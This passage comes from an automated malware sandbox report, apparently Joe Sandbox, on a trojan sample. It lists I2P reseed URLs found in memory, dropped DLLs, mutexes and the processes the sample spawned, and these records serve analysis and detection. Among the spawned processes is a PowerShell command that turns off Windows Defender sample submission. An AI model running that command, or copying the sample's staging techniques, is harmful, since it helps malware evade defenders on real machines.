Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.000002986492C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989048987.000002986495A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 00000028.00000002.2529607150.0000029864EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
Source: svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528121324.0000029864937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 00000028.00000002.2527366735.00000298640B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2529607150.0000029864EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000028.00000003.1989355515.0000029864927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://reseed.diva.exchange/
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/J
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/W
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/c
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/o
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/r
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://reseed2.i2p.net/
Source: svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
Source: svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virt
Source: svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.
Source: svchost.exe, 00000000.00000003.1364769439.000001A7F5041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000003.1364623479.000001A7F505D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1365624998.000001A7F502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000002.1365663996.000001A7F5034000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtuxA
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak0
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://www2.mk16.de/
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE929A inet_addr,ntohl,13_2_00007FF7E3CE929A
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,13_2_00007FF7E3CE292E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\miECvZvT
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032C5B4A6_2_032C5B4A
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032C4B566_2_032C4B56
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032D53FA6_2_032D53FA
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032DD1326_2_032DD132
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032D702E6_2_032D702E
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032C60DA6_2_032C60DA
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032C7F3A6_2_032C7F3A
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032C9D026_2_032C9D02
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032CCDB26_2_032CCDB2
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CEE4E013_2_00007FF7E3CEE4E0
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CEDE8A13_2_00007FF7E3CEDE8A
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CFB54013_2_00007FF7E3CFB540
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FF7AABDC44029_2_00007FF7AABDC440
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FF7AABE1AB029_2_00007FF7AABE1AB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227206B829_2_00007FFB227206B8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2271088029_2_00007FFB22710880
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227537C829_2_00007FFB227537C8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227424D029_2_00007FFB227424D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2276EF6029_2_00007FFB2276EF60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2277F6D829_2_00007FFB2277F6D8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2277F67829_2_00007FFB2277F678
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23ABCB1029_2_00007FFB23ABCB10
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23ADEAA029_2_00007FFB23ADEAA0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23AEE6D829_2_00007FFB23AEE6D8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23AEE67829_2_00007FFB23AEE678
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23B1048029_2_00007FFB23B10480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23B08FFC29_2_00007FFB23B08FFC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23B08F0E29_2_00007FFB23B08F0E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23B08DC629_2_00007FFB23B08DC6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23B2057829_2_00007FFB23B20578
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23B08CDB29_2_00007FFB23B08CDB
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: String function: 00007FF7E3CE14E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFB2273C852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFB22769DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFB227040D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFB23AB2072 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF7AABD2EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFB23B077A2 appears 388 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFB23AD1352 appears 398 times
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988
Source: nHqxqt5L.29.drStatic PE information: Number of sections : 11 > 10
Source: miECvZvT.29.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.29.drStatic PE information: Number of sections : 11 > 10
Source: evtsrv.dll.29.drStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.29.drStatic PE information: Number of sections : 11 > 10
Source: VPIOcgIO.29.drStatic PE information: Number of sections : 11 > 10
Source: UEptccWa.29.drStatic PE information: Number of sections : 11 > 10
Source: TLbqzKsW.29.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.29.drStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.29.drStatic PE information: Number of sections : 11 > 10
Source: termsrv32.dll.29.drStatic PE information: Number of sections : 11 > 10
Source: x8eec9dQ.29.drStatic PE information: Number of sections : 11 > 10
Source: file.exeStatic PE information: Number of sections : 11 > 10
Source: e5xaOqBz.29.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.29.drStatic PE information: Number of sections : 11 > 10
Source: fQQIqQM0.29.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.29.drStatic PE information: Number of sections : 11 > 10
Source: file.exe, 00000006.00000002.1277094021.0000000002C3A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe, 00000006.00000000.1272581856.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: file.exeBinary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@57/74@1/52
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,13_2_00007FF7E3CE855D
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE1A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,13_2_00007FF7E3CE1A19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FF7AABD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,29_2_00007FF7AABD1DBC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FF7AABD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,29_2_00007FF7AABD1DBC
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:3088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess7988
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5364:120:WilError_03
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.batJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat"
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
